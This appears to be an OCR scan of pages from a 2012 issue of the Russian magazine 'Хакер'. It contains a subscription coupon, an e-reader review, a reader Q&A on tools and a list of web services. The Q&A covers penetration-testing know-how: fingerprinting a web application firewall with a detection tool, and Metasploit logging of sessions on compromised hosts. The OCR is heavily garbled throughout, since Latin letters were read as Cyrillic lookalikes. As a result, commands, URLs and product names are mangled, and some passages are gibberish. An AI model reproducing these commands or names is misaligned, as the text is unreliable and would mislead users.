нижеперечисленных способов: 

• на е-таіі: биЬзсгіЬейдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 115280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ 
МОЖНО ОФОРМИТЬ С НОЯБРЯ. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА 
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ 
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 



ЕСТЬ ВОПРОСЫ? Пиши на іпіойдіс.ги или звони по бесплатным телефо- 
нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей 
других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 201 г. 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером ■ 

□ на адрес ос|эиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ; 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіІ 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


/\дрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с Мо 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 





РЕКііим 



Сергей Никитин 



>^ЕХЬЕК.ВООК 

Т7055 



и ШВЕЦ, и ЖНЕЦ, И НА ДУДЕ 
ИГРЕЦ С ЦВЕТНЫМ СЕНСОРНЫМ 
ДИСПЛЕЕМ 



Технический прогресс предоставляет нам ши- 
рочайшие возможности для решения вопроса 
о том, чем же заняться по пути на работу, 
учебу или в длительном путешествии. Порта- 
тивные электронные устройства позволяют 
нам слушать музыку, смотреть фотографии 
и фильмы или читать электронные книги, ког- 
да хочется чего-то более интеллектуального. 
ѴѴЕХІЕР.ВООК Т7055 как раз подойдет «поли- 
глоту», следящему за новинками индустрии. 
Забота компании о покупателях чувствуется 
сразу после распаковки устройства: поми- 
мо всех необходимых проводов и кабелей, 
а также удобного кожаного чехла, надежно 
защищающего ѴѴЕХІЕР.ВООК Т7055 от влия- 
ния внешней среды, в комплект поставки 
входит несколько сертификатов на бесплат- 
ное скачивание электронных книг в крупных 
онлайн-магазинах. Пора переходить к циви- 
лизованному отношению к чужой интеллекту- 
альной собственности! 

После включения самого устройства, как, 
впрочем, и в процессе дальнейшей работы 
с ним, тоже испытываешь только приятные 
ощущения. Естественно, первое, на что об- 
ращаешь самое пристальное внимание, — это 
экран, особенно если он цветной и сенсор- 
ный, как у ѴѴЕХІЕР.ВООК Т7055. Смеем тебя 
заверить: с экраном тут всё в порядке! Цвета 
натуральные и яркие, изображение четкое, 
что особенно важно еще и потому, что, помимо 
текстовых файлов, эта читалка также умеет 
работать с видео и фотографиями, не говоря 
уже об аудио практически всех распростра- 
ненных форматов. Но раз производитель на- 
звал свое устройство электронной книгой, то 
не будем с ним спорить. Тем более что читать 
с ее помощью действительно удобно — глаза 
не устают, и даже при «перелистывании» 
страниц не возникает неприятных ощущений. 
К тому же ТРТ-ридеры рассчитаны как раз 
на использование в помещениях с недоста- 
точным освещением. Для большего удобства 
ѴѴЕХІЕР.ВООК Т7055 оснащен 6-сенсором, 



щщ 


Ш 




ж 



Экран: цветной, сенсорный, 7", ІЕО 
Встроенная память: 8 Гб 
Дополнительная память: тісгоЗО, до 32 Гб 
Форматы текста: АМ5І, ІІпісосІе, ТХТ, РОГ, 
НТМІ, РОВ, ЕРОВ, РВ2, ОЗѴО, ООС 
Форматы аудио: МРЗ, ѴѴМА, ПАС, ААС, ѴѴАѴ, 
000 

Форматы изображений: ЗР0, ВМР, 0ІР 
Форматы видео: ѴѴМѴ, РМ, АѴІ, РМѴВ, 30Р, ПѴ, 
МР4, ОАТ, ѴОВ, МР0, МРЕ0, МКѴ, МОѴ 
Дополнительно: РМ-радио 
Габариты: 190 х 125 х 11,5 мм 
Масса: 315 г 



ПЛЮСЫ и МИНУСЫ 



+ Качественный экран 

+ Много функций и поддерживаемых 

форматов 

+ Низкая стоимость 




благодаря которому ориентация изображе- 
ния на экране автоматически меняется, как 
у планшетов и смартфонов. 

Восьми гигабайт встроенной памяти 
должно хватить для хранения всех шедевров 
мировой литературы, а остальные мульти- 
медийные файлы можно «складировать» 
на картах памяти ппісгобО объемом до 32 Гб. 
Работать со всей библиотекой, как, впрочем, 
и с самим устройством, тебе будет очень про- 
сто благодаря продуманному меню и удобным 
элементам управления. Также отметим на- 
личие встроенного РМ-приемника с функцией 
записи. 



выводы 



Очевидно, что электронная книга ѴѴЕХЕЕР. 
ВООК Т7055 удалась. Большой цветной экран 
отличается высоким качеством. Устройство 
обладает множеством функций. Есть даже 
встроенный словарь и простенькие игры. 

При этом читалку удобно использовать, 
а комплект поставки включает в себя всё 
необходимое и даже больше. Поддержка карт 
памяти популярного формата ппісгобО также 
не будетлишней. В общем, владелец ѴѴЕХЕЕР. 
ВООК Т7055 вряд ли заскучает в долгой до- 
роге. К его услугам книги, фотографии, видео 
и РМ-радио. 
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6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



(дше)Іапі 

ПОДПИШИСЬ! 

зііор.діс.ги 

Редакционная подписка без посредников — 
это гарантия получения важного для Вас 
журнала и экономия до 40% от розничной 
цены в киоске 

8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 




6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 810 руб. 
13 номеров — 1499 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 




6 номеров — 630 руб. 
13 номеров — 1140 руб. 



6 номеров — 895 руб. 
13 номеров — 1699 руб. 



6 номеров — 1194 руб. 
13 номеров — 2149 руб. 



6 номеров — 894 руб. 
13 номеров — 1699 руб. 










6 номеров — 690 руб. 
13 номеров — 1249 руб. 



6 номеров — 775 руб. 
13 номеров — 1399 руб. 



6 номеров — 950 руб. 
13 номеров — 1699 руб. 



6 номеров — 810 руб. 
13 номеров — 1499 руб. 











им1Т5/РАаим1ТЕ0 



Степан Ильин (іѵѵІіиег.сот/БІераН) 



РАО ипііесі 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РА^^КЕА^.XАКЕР.К^ 




ЕСТЬ ЛИ СПОСОБ БЫСТРО ПРОКАЧАТЬ 
АККАУНТ НА ОРОРВОХ.СОМ. ТО ЕСТЬ 
УВЕЛИЧИТЬ ДОСТУПНЫЙ ОБЪЕМ, 

НЕ ПРИБЕГАЯ К РАЗНЫМИ ПИТЕРСКИМ 
СПОСОБАМ? ВЫ О НИХ ПИСАЛИ — Я ИХ 
ЗНАЮ! 

□ Именно сейчас есть возможность 

получить дополнительно 4,5 Гб за счет 
участия в бета-тестировании нового функцио- 
нала сервиса. ОгорЬох.сот вводит новые 
удобные фишки для загрузки фотографий 
и видео с внешних накопителей. Идея в том, 
чтобы предоставить пользователю механизм, 
автоматически загружающий изображения 
в «облако» при подключении к компьютеру 
фотоаппарата или карты памяти. Пощупать 
новую опцию, а заодно получить 500 Мб 
к объему доступного дискового пространства 
в ОгорЬох за каждые загруженные 500 Мб 
изображений можно уже сейчас. Для этого 
нужно загрузить тестовый билд ОгорЬох, взяв 
его из специальной ветки на форуме сервиса 
( ЬіЫу/АЕЬЬѵР ). Помимо этого, в АиІоРІау (меню, 
которое появляется, когда система обнаружи- 
вает новый внешний носитель) необходимо 
прописать ОгорЬох. В ѴѴіпсІоѵѵз 7 эта функция 
доступна в Сопігоі РапеІ -> Нагсіѵѵаге апб ЗоипсІ 
-> Аиіоріау, а в ХР включается в контекстном 
меню каждого отдельного накопителя. 

МОЖНО ЛИ ОПРЕДЕЛИТЬ, ЧТО 
НАХОСТЕ ИСПОЛЬЗУЕТСЯ ѴѴАР 
(ФАЙЕРВОЛ ДЛЯ ВЕБ-ПРИЛОЖЕНИЙ)? 



□ Разумеется! Каждый ѴѴАР характеризу- 
ется определенными «отпечатками 
пальцев», по которым его можно опознать. 

В Сети можно найти специальные утилиты, 
правда, в большинстве своем узкоспециализи- 
рованные, направленные на выявление 
конкретных ѴѴАР. Например, тулза ітрегѵа- 
сіеіесі ( сосІе.доодІе.сопп/р/іппрегѵа-сІе1есі ) 
позволяет выявить использование известного 
Ітрегѵа ѴѴАР: 

# ./ ітрегѵа -сіе1:ес1;. 5 Ь Ы;1;р5 ://ѵ\ДлЛл/. 
ехатріе.сот 



Те5І:іп§ [Ы;1;р5://ыыы. ехатріе.сот] Тог 
ргезепсе оТ аррИсаТіоп бгеыаіі — 



ТезТ 0 - СоосІ ІІзег А^епТ... 

/ аррІісаТіоп бгеыаіі роззіЫу ргезепТ 

ТезТ 1 - ІлІеЬ ІеесЬ ІІзег А^епТ... 

/ аррИсаТіоп Тгеыаіі роББІЫу ргезепТ 
ТезТ 2 - Е-таі1 СоІІесТог КоЬоТ ІІзег 
/ аррІісаТіоп бгеыаіі роББІЫу ргезепТ 
ТезТ 3 - ВІиеСоаТ Ргоху МапіриІаТіоп 
/ аррІісаТіоп бгеыаіі роззіЫу ргезепТ 

ТезТ 4 - ІлІеЬ Іліогт Віоскіп^... 

/ аррІісаТіоп бгеыаіі поТ сІеТесТесІ 
ТеБТ 5 - Х55 В1оскіп§. . . 

/ аррИсаТіоп Тгеыаіі роББІЫу ргезепТ 



— Те5Іі5 РіпізЬесІ оп [ЬТТрз ://ыыы. 

ехатріе.сот] 

4 оиТ оТ 5 1:е5І:5 іпсИсаТе Ітрегѵа 
аррИсаТіоп Тгеыаіі ргезепТ — 





Из универсальных назову тулзуѴѴАРѴѴООР 
( сосІе.доодІе.сопп/р/ѵѵаІЛі ). которая может по- 
хвастаться сигнатурами для выявления сразу 
нескольких ѴѴАР. На официальном сайте нет 
исходников, поэтому их нужно загружать из ре- 
позитория 5ѴМ. 



□ действительно ли сейчас 

ПРАВООХРАНИТЕЛЬНЫЕ ОРГАНЫ 
МОГУТ ОПРЕДЕЛИТЬ, ГДЕ НАХОДИТСЯ 
КОНКРЕТНОЕ УСТРОЙСТВО, ПО ЕГО 
МАС-АДРЕСУ? 



□ Да какие уж там правоохранительные 
органы! Посмотри МАС-адрес своей 
точки доступа и попробуй поискать его в базах 
геолокационных сервисов вроде Соодіе 
ЕосаЬоп Зегѵісез ( зату.рі/ітіархзз ) и ЗкуЬоок 
( ѵѵѵѵѵѵ.зкѵЬоокѵѵігеІезз.сопп ). Думаю, даже они 
смогут указать местоположение устройства 
с пугающей точностью. Естественно, в базах 
может не оказаться запрошенного МАС-адреса, 
а положение точки доступа вполне может 
измениться, однако вероятность обнаружить ее 
очень велика. Чтобы ты понимал, эти базы 
активно пополняются за счет огромного 
количества мобильных устройств, которые 
анонимно отправляют на сервера Соодіе 
информацию о текущем расположении, 
находящихся поблизости сотовых станциях 
и точках доступа ѴѴі-Рі. 




КАКИМ ОБРАЗОМ МОЖНО 
АНАЛИЗИРОВАТЬ ПРОШИВКИ ДЛЯ 



КАК СДЕЛАТЬ СОВРЕМЕННЫЙ ИНТЕРФЕЙС ДЛЯ ВЕБ-ПРИЛОЖЕНИЯ ЗА 15 МИНУТ 



овременные веб-приложения задают 
очень высокую планку по качеству 
интерфейса. Последний не только 
должен быть красивым — он должен коррек- 
тно отображаться во всех браузерах и под- 
держивать современные технологии НТМЕ5. 

С нуля программировать все стили и скрипты 
муторно. К счастью, есть отличные стартовые 
наборы для создания Ш-приложений. 



Широко известная компания ТѵѵЮег 
бесплатно предлагает всем свой Ш- 
фреймворк Вооізігар ( іѵѵіиег.діЛіиЬ. 
сот/ЬооІзІгар ). Разработка позволяет созда- 
вать отличные интерфейсы сайтов за считан- 
ные часы (проверено на собственном опыте) 
на основе готовых элементов и экономить 
огромное количество времени на адаптации 
кода для разных браузеров (даже ІЕ7). 



I I Все элементы интерфейса гибкие. 

Компоненты корректно, без искаже- 
I I ний, отображаются при разных раз- 
решениях экрана и на различных устройствах. 
Интерфейс на Вооізігар одинаково хорошо 
выглядит как на десктопе, так и на планшете 
или смартфоне. Ктомуже Вооізігар поддержи- 
вает разные сетки, в том числе модную сейчас 
940-пиксельную. 
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РАОиМІТЕО 



РАЗЛИЧНЫХУСТРОЙСТВ? ОПРЕДЕЛЯТЬ, 
КАК ОДНА ВЕРСИЯ ИЗМЕНИЛАСЬ 
ПО СРАВНЕНИЮ С ДРУГОЙ? 



БОЛЬШОЙ ВОПРОС 



□ в двух словах на этот вопрос не ответить. 

Но подскажу полезный инструмент для 
подобных исследований — Віпѵѵаік [ сосіе.аооаіе. 
соіп/р/ЬіпѵѵаІк ). Эта утилита предназначена для 
поиска отдельных файлов и исполняемого кода 
внутри заданного образа, при этом она заточена 
как раз под идентификацию файлов внутри 
образов прошивок. Для этого в нее включен 
набор сигнатур для файлов, часто встречаю- 
щихся в прошивках, заголовков Ггтѵѵаге, ядер 
Ыпих, бутлоадеров, файловых систем и т. д. 



□ 



КАК ПОЛУЧИТЬ КОЛИЧЕСТВО 
ПОДКЛЮЧЕНИЙ К МОЕЙ БАЗЕ 
ДАННЫХ МУ501? 



□ Вообще, список всех активных клиентов 
выдает команда зЬоѵѵ ргосеззІізТ 
Используя таблицу ргосеззіізі из БД 
іп^огтаІіоп_5сЬеппа, мы также можем получить 
нужную информацию с помощью 501-запроса: 



ту5ц1 -и ГООІ: -р -ВМе "5е1ес1: 
I^051;^соип1;(I^о51:) Тгот ргосе55ІІ5І; 
§гоир Ьу І105І:;" іпТогта1:іоп_5сІіета 



ВОПРОС ОТ НАЧИНАЮЩЕГО 
ВЕБ-ПРОГРАММИСТА. НА САЙТЕ 
НЕОБХОДИМО РЕАЛИЗОВАТЬ 
РЕАЛ-ТАЙМ ВЗАИМОДЕЙСТВИЕ С ПОЛЬ- 
ЗОВАТЕЛЯМИ. ДАННЫЕ НЕОБХОДИМО 
ПОДГРУЖАТЬ ПОЛЬЗОВАТЕЛЯМ И ЗА- 
БИРАТЬ ОТ НИХ ПРАКТИЧЕСКИ В РЕ- 
АЛЬНОМ ВРЕМЕНИ. ТАК КАК СЕЙЧАС 
РАЗРАБАТЫВАЕТСЯ ПРОТОТИП СИСТЕМЫ, 
Я ХОЧУ ПОЙТИ ПО ПУТИ НАИМЕНЬШЕГО 
СОПРОТИВЛЕНИЯ И РЕАЛИЗОВАТЬ ВСЁ 
МАКСИМАЛЬНО ПРОСТО. НО КАК? 




Здесь нужно вспомнить про СотеТ 
Напомню, Соплей — это набор 
приемов и средств, позволяющих 
быстро обновлять данные в браузере 
(страницы и их элементы) без участия 
пользователя. Подробнее об этом наборе 
можешь прочитать в нашем материале 
«Реал-тайм в Вебе: технология Соплей для 
построения быстрых веб-приложений» 
[ ЬіЫѵ/ѵ^УОЖ ]. Самое простое — уста- 
новить один из Соте^серверов, на- 




пример Ок1аЬ_Реа1р1ехог ( сІкІаЬ.ги/ІіЬ/ 
бкІаЬ геаіріехог і или БоскеЫО ( зоскеТ 
'''). Если Ок1аЬ_Реа1р1ехогуже готовый 
продукт, который «заведется» сразу 
после установки на сайте (если он у тебя 
написан на РНР или РуЛлоп), то ЗоскеС 
ІО скорее похож на конструктор 1Е60 
тіпсІзЫіогтз — придется еще поработать 
напильником и написать собственный АРІ 
для интеграции в существующий проект. 
Однако СотеЬсервер можно арендовать 
в виде ризИ-сервиса, который позволяет 
поддерживать реал-тайм общение между 
клиентами проекта, не создавая и не под- 
держивая собственную серверную инфра- 
структуру. Из наиболее известных могу 
выделить: РизИег (ризИег.Сотеі), РиЬпиЬ 
( ѵѵѵѵѵѵ.риЬпиЬ.сот І. РагЩІ ( собе.дооаіе. 
сопл/р/раг1:с1 ). ВеасопРизИ ( ЬеасопризИ. 
сопл ). Х-5^геат.1у ( х-з^геат.Іѵ ) и іоВгісІде 
( іоЬгісІде.соіп І. Подробнее об их исполь- 
зовании ты можешь прочитать в блоге 
нашего автора Александра Лозовюка (ЫГ 
Іѵ/уЦсдпл І. 



КАК СОХРАНИТЬ ВЫВОД В ФАЙЛЕ 
ДЛЯ М5Р? 



□ В МеІазрІоЛ Ргаплеѵѵогк довольно долго 
существовала одна проблема, которая 
заключалась в том, что сохранить вывод 
в файле обычными средствами было 
невозможно. Всё отображалось в консоли, 
и текст даже можно было скопировать 
с помощью стандартного <СігІ + С>, но при 
большом объеме информации это уже 
становилось затруднительным. Конечно, 
у М5Р есть удобная база данных, но, 
к сожалению, туда стекается далеко не всё, 
а только избранное из тех модулей, которые 
умеют с такой базой работать. В конечном 
итоге приходилось использовать разные 
костыли. Но свершилось чудо! У разработчи- 
ков наконец-то дошли руки до этой пробле- 
мы, и всё упростилось донельзя! Теперь мы 
можем просто запустить М5Р и ввести 




Сервис РизЬег позволяет в реальном времени доставлять сообщения веб-приложению, работающему 
на любых устройствах 



Фреймворк изначально развивался 
как набор гайдлайнов для програм- 
мистов и объединил в себе лучшие 
практики и примеры, накопленные в Тѵѵіиег. 
Поверь, эти парни знают, что такое правиль- 
ный код. Документация поможеттебе мак- 
симально быстро въехать, как использовать 
Вооізігар. На сайте есть три готовых шаблонов 
для быстрого страта. 



Вооізігар изначально проектиро- 
вался так, чтобы корректно работать 
с )Оиегу-плагинами. Таким образом, 
ты максимально просто можешь реализовать 
интерактивное взаимодействие с пользова- 
телем, прибегнув к знакомым инструментам. 

На специальной странице сейчас доступно 12 
специальных )Оиегу-плагинов, в том числе для 
выпадающего меню , табов и т.д. 



Использовать ВооіЗігар могут как 
продвинутые разработчики, которые 
хотят сэкономить время, так и те, 
кому нужно сделать качественный интерфейс 
на коленке, не заморачиваясь изучением со- 
временных технологий. В противном случае 
придется долго чесать голову, как сделать 
красивые кнопки, прогресс-бары, метки и т. д. 
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им1Т5/РАаим1ТЕ0 



команду зрооі /гооі/оѵѵпесІ_іп1'о.ІхІ. Здесь 
/гооі/оѵѵпесІ_іп1'о.ІхІ — путь к файлу для со- 
хранения вывода из М5Р и имя этого файла. 
Что еще интереснее, по заявлениям разра- 
ботчиков, зрооі при включении легирует и вы- 
воды со всех сессий (шеллы на захваченных 
хостах). Это, согласись, очень удобно. Для 
отключения легирования служит команда 
зрооі о1"Р 

□ СТЬ ОГРОМНЫЕ ЛОГ-ФАЙЛЫ. 

ПОДСКАЖИ КАКОЙ-НИБУДЬ 
УДОБНЫЙ ИНСТРУМЕНТ ДЛЯ ИХ 
ПРОСМОТРА, ЧТОБЫ РАБОТАЛ ПОД 
ВИНДОЙ И НИКСАМИ. 6РЕР ДЛЯ 
АНАЛИЗА НЕ ПРЕДЛАГАТЬ :). 



□ Я для этих целей использую очень 
прикольную утилиту діодд ( діодд. 
ЬоппеІ'оп.огд ). Она работает под разными ОС 
и позволяет выполнять поиск и анализ 
по о-о-о-чень большим логам. Особенно 
приятно, что графический интерфейс 
дополняет вся мощь утилит дгер и Іезз. 



□ ПОЧЕМУ-ТО ОБХОЖУ СТОРОНОЙ 
ЛОГИ ѴѴІМ00ѴѴ5, СЧИТАЯ ИХ 
БЕСПОЛЕЗНЫМИ. НО ВДРУГ Я ЧЕГО-ТО 
НЕ ПОНИМАЮ И ОНИ МОГУТ ПОМОЧЬ 
ВЫЯСНИТЬ ПРИЧИНЫ, СКАЖЕМ, ЧАСТЫХ 
СБОЕВ? 



□ В логах фиксируются все сбои и дей- 
ствия, выполнявшиеся за последнее 
время на данном компьютере. Это значит, что 
благодаря им можно выявить причину 
неполадок, но ты прав: выудить нужные 
данные из огромного количества информации 
— задача непростая. Разобраться в логах 
помогут утилиты ѴѴіпбоѵѵз Еѵепі Ѵіеѵѵег РІиз 
[ Ьир://ЫЫу/2пЬ9^5 І и ѴѴіпбоѵѵз 8 Год СоІІесІог 
[ Ьир://ЬіЫѵ/ѵѵѵРІОпп ]. Последняя сама 
собирает и протоколирует все нужные 
данные, позволяя при этом выбрать область 



для просмотра последних записей журнала. 

В результате пользователь получает 
подробный журнал событий, с помощью 
которого можно выяснить все причины сбоев 
операционной системы. 

ХОЧУ ЧУТЬ ПОМОЧЬ РОДНОМУ 
ДЕКАНАТУ И НЕМНОГО 
АВТОМАТИЗИРОВАТЬ ЕГО 
ДОКУМЕНТООБОРОТ. ДЛЯ ЭТОГО НУЖЕН 
СКАНЕР ШТРИХ-КОДОВ, НО КУПИТЬ ЕГО 
НЕТ ВОЗМОЖНОСТИ. ЕСТЬ ЛИ КАКАЯ-ТО 
АЛЬТЕРНАТИВА ДОРОГОСТОЯЩЕМУ 
СКАНЕРУ? 

Если не подойдет обычная ОЗВ-камера, 
то можно заюзать старую оптическую 
мышку. Ее сенсор очень быстро получает 
изображение с небольшой поверхности, 
запоминает его и по координатам X и У 
вычисляет смещение относительно предыду- 
щей позиции. Умельцы научились использо- 
вать это для захвата изображений с помощью 
Агбиіпо. Подробности ты можешь прочитать 
в статье отѵѵеЬаІ'1' [ ЫЫу/гМРкрР ]. 

ВЫ НЕРЕДКО ПИШЕТЕ 
О «ПЕСОЧНИЦАХ», ПОЗВОЛЯЮЩИХ 
ЗАПУСТИТЬ ПРОГРАММУ 
В ИЗОЛИРОВАННОМ ОКРУЖЕНИИ 
И ПОСМОТРЕТЬ, ЧТО ОНА ДЕЛАЕТ 
В СИСТЕМЕ. А ЕСТЬ ЛИ ТАКИЕ РЕШЕНИЯ 
ДЛЯ МОБИЛЬНЫХ ПЛАТФОРМ? 

Есть для АпбгоісІ! Это проект РгоісІВох 
( ), который 

запускает мобильные приложения в изолиро- 
ванной среде и наблюдает за их поведением. 
Полученный отчет включает: 

• хеши анализируемого приложения; 

• исходящие/входящие сетевые данные; 

• операции с файлами; 

• запущенные сервисы и классы, загружен- 
ные через РехСІаззЕоасІег; 




□ 




□ 









ИПінкпт 

Еѵміі 

ІШіѴПіиІвміііСк* 





ШПНИЯ 

№Мі 

Н1 Е-1№Г 

ПЧ ГН»іі 

В 

ппшт 
іапгмж 

ітнзпБ 
им 



ншян 

Н4*Н4 

втвя 



тЮй 

ІІОЛТ] РІІН 
ппа ІИ4 

тіійп твд№ 




шкуш 

ПТНІІЧ 

ЧкнжЯ ПМм ккщшк 



Удобная тулза для просмотра логов ѴѴіпсІоѵѵз-системы 



• утечки информации через сети, файлы 
и5М5; 

• обходы разрешения; 

• криптографические операции, проведен- 
ные через АпсІгоісІ АРІ; 

• прослушанные Ьгоасісазі-сообщения; 

• отправленные 5М5 и совершенные теле- 
фонные вызовы. 



□ 



В ѴѴіпсІоѵѵз-системе есть одно критиче- 
ски важное приложение. Необходимо, 
чтобы оно всегда было запущено. В случае 
краша необходимо запустить его заново. Как 
это реализовать? 



□ Нужен такой инструмент, который, 
во-первых, мониторит запущенные 
процессы и сервисы и, во-вторых, может их 
перезапустить их в случае неполадок. Я 
использую для этого Кпаз Резіагіег [ ѵѵѵѵѵѵ. 
кпаз.зе ). Перезапуск, впрочем, не единствен- 
ное возможное действие, которое Кпаз 
Резіагіег выполняет, обнаружив проблему 
у некоторого приложения. Логику можно 
переопределить. 



□ 



ПОМОГИТЕ РЕШИТЬ ПРОБЛЕМУ. 



ЕСТЬ ДВЕ РАЗНЫЕ ВЕРСИИ ОДНОЙ 
И ТОЙ ЖЕ ПРОГРАММЫ, КОТОРЫЕ 
НЕ УЖИВАЮТСЯ МЕЖДУ СОБОЙ, ТО ЕСТЬ 
В ОПЕРАЦИОННОЙ СИСТЕМЕ МОЖНО 
УСТАНОВИТЬ ЛИБО ОДНУ ВЕРСИЮ, ЛИБО 
ДРУГУЮ. КАК РЕШИТЬ ЭТУ ПРОБЛЕМУ, 
НЕ СОЗДАВАЯ ДЛЯ КАЖДОЙ ИЗ НИХ 
ОТДЕЛЬНУЮ ВИРТУАЛЬНУЮ МАШИНУ? 



□ Я в такой ситуации использовал 
бесплатную утилиту Еѵаіаге [ ѵѵѵѵѵѵ. 
еѵаіаге.сіе ). Что она делает? Создает для 
выбранного приложения виртуальное окруже- 
ние со своей файловой системой и реестром. 
Это называется виртуализация приложений. 
Такой подход позволяет переносить приложе- 
ния с одной систему на другую без установки 
и, что важно в нашем случае, запускать 
на одной системе несовместимые друг 
с другом приложения! Этот подход также 
часто применяется для запуска старых 
приложений или игр под управлением 
современных ОС. 



□ МОЖНО КАК-НИБУДЬ 
ПРИМОНТИРОВАТЬ МОИ 
ДОКУМЕНТЫ, КОТОРЫЕ ХРАНЯТСЯ 
В 6006ЕЕ В0С5, ЧТОБЫ ОТКРЫВАТЬ ИХ 
ЧЕРЕЗ ОБЫЧНЫЙ «ОФИС»? 



□ Мой ответ — использовать ^оикии 

[ ѵѵѵѵѵѵ.]оикии.сопп ). Подключив к ^оикии 
«облачные» хранилища (сейчас она работает 
с ОгорЬох, Ооодіе Оосз и Вох.пеі), можно 
работать с онлайн-файлами так же, как и с 
локальными. Например, редактировать 
документы из Ооодіе Оосз в МісгозоЙ ОІ^Лсе 
или любом другом офисном пакете, и они 
будут автоматически синхронизироваться 
с Ооодіе. ^ 
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иМІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 



ІРТТТ 



ІІ^иіСОПП 

Название сервиса представляет собой аббревиатуру ІРТТТ: «іИЫз, іЬеп іЬаІ» — «если 
это, тогда то». Это блестящий инструмент, с помощью которого можно связать между 
собой популярные веб-приложения: бтаіі, ОгорЬох, Еѵегпоіе, Іпзіарарег, РасеЬоок, 
Тѵѵіиег, Іпзіадгат, Роигзриаге и другие. К примеру, можно задать правило: если сме- 
нилась аватарка в РасеЬоок, то использовать ее как аватар в Твиттере. Или другое: 
если завтра будет дождь, то предупредить меня по 5М5. Если кто-то зафрендил меня 
в Твиттере, то отправить ему приветствие в личном сообщении. Если в СптіаіІ отмечено 
какое-то письмо, то создать заметку в Еѵегпоіе. Если появилась новая запись в Р55- 
ленте, то отправить мне ее по е-таіі. И так далее. 

Связующее звено для различных интернет-сервисов 






® ва 







Поисковикдлягиковсудобными фишками 



оискоискбо 



сіисксіискао.сопп 

Если кратко, то это поисковик для гиков. Проект активно развивается с 2008 года 
и предоставляет несколько любопытных фишек. Во-первых, ОискОискбо вообще 
не следитза пользователями и их запросами — по крайней мере, анонимность обе- 
щают его создатели. Во-вторых, он поддерживает горячие клавиши, чтобы было удобно 
пользоваться поиском даже с помощью одной только клавиатуры. В-третьих, поль- 
зователю предоставляется огромное количество так называемых доосііез, позволяю- 
щих прямо из поисковой строки выполнить самые разные действия (арифметические 
вычисления и т.п.). Ктому же в ОискОискбо практически отсутствует поисковый спам 
и реклама (во всяком случае, пока — когда проект еще не очень популярен). 




Мониторингсайта на появление подозрительныхэлементов 



«НА ЗАМОК» 



пагаітіок.сопп 

Прошли те времена, когда взлом мог ограничиться только дефейсом. Сейчас каждый 
пытается извлечь для себя выгоду. Поэтому на взломанном ресурсе тут же могут поя- 
виться ЭаѵаЗсгірІ и ІРгате с вирусом или рекламой. Или дорвеи и фишинговые стра- 
ницы. В конце концов, скрытые внешние ссылки, которые помогут какому-то ресурсу 
нарастить ссылочную массу. Автоматизированно проверять каждую страницу ресурса 
на наличие подозрительных элементов позволяют различные сервисы, один из них 
— пагаток.сопп . Проект еще только стартует, поэтому во время бета-тестирования ты 
можешь бесплатно добавить пять сайтов с мониторингом 150 страниц первого, второго 
и третьего уровня. Проверка будет производиться раз в день, а уведомления отправ- 
ляться на е-таіІ. 




Песочница для хакера 



ЛАБОРАТОРИЯ ХАКЕРА 



ѵѵѵѵѵѵ.Ьаскіпд-ІаЬ.сопп 

Во многих статьях мы пишем фразу «исключительно в ознакомительных целях». Чтобы 
попробовать полученные знания в деле, прокачивая свои навыки в области информаци- 
онной безопасности, созданы специальные площадки. Здесь ты можешь эксперименти- 
ровать сколько влезет и при этом не нарваться на серьезные неприятности с законом. 

В рамках проекта 0ѴѴА5Р открыласьтак называемая лаборатория Наскіпд-ЕаЬ. Загрузив 
